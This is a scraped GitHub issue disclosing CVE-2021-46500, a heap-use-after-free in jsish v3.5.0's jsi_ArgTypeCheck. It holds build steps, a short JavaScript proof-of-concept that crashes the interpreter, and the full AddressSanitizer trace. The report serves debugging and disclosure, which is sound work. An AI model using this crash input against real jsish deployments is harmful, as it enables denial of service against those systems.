Headline
CVE-2021-46500: Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck · Issue #85 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
hope-fly opened this issue
Dec 24, 2021
· 2 comments
Comments
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
var JSEtest = [ 'aa’, 'gg’, 'hhh’, ‘mm’, ‘nn’ ]; ‘sort:’ + JSEtest.sort(function (str, position) { return JSEtest.unshift(‘pop:’ + JSEtest.pop()); }); !’concat:’ + JSEtest.concat().every(function (E) { return ‘sort:’ + JSEtest.sort(function (str, position) { return JSEtest.unshift(‘pop:’ + JSEtest.pop()); }); });
Execution steps & Output
$ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0 READ of size 1 at 0x603000007458 thread T0 #0 0x5566730cf1c9 in jsi_ArgTypeCheck src/jsiFunc.c:207 #1 0x556673158c49 in jsi_FuncCallSub src/jsiProto.c:263 #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #5 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #6 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220 #7 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777 #8 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970 #10 0x7f067f973311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311) #11 0x7f067f9736b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5) #12 0x55667318a611 in jsi_ArraySortCmd src/jsiArray.c:1065 #13 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244 #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #17 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #18 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220 #19 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777 #20 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #21 0x55667319bf64 in jsi_ArrayFindSubCmd src/jsiArray.c:576 #22 0x55667319bf64 in jsi_ArrayEveryCmd src/jsiArray.c:663 #23 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244 #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #27 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #28 0x556673439274 in jsi_evalStrFile src/jsiEval.c:2665 #29 0x55667312866a in Jsi_Main src/jsiInterp.c:936 #30 0x55667392d03a in jsi_main src/main.c:47 #31 0x7f067f952bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #32 0x5566730bc969 in _start (/usr/local/bin/jsish+0xe8969)
0x603000007458 is located 8 bytes inside of 32-byte region [0x603000007450,0x603000007470) freed by thread T0 here: #0 0x7f06805c17a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5566730dd6cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here: #0 0x7f06805c1d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55667312daa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck Shadow bytes around the buggy address: 0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd =>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd[fd]fd fd fa fa 0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
This issue may be related to #74 & #80, especially the POC, but I’m not for sure. Report this issue to assist your debug.
2 participants
